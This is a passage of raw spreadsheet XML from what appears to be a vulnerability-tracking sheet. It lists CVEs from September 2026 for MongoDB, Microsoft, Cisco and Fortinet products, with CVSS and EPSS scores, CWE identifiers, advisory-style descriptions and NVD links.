      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Unified Extensible Firmware Interface (UEFI) Shell implementation of Cisco UCS Servers and UCS-based appliances could allow an authenticated attacker with valid credentials for a user account with the role of user or admin&amp;nbsp;or an unauthenticated attacker with physical access to an affected device to bypass UEFI Secure Boot validation checks and execute unauthorized software.
This vulnerability is due to the availability of memory write commands in the UEFI Shell while UEFI Secure Boot is enabled on a device. An attacker could exploit this vulnerability by selecting the UEFI Shell boot option at boot time and using available shell commands to modify UEFI memory variables. A successful exploit could allow the attacker to manipulate the preboot environment, overwrite UEFI Secure Boot-related memory values, and execute unauthorized software on the affected device.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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78" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K279" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
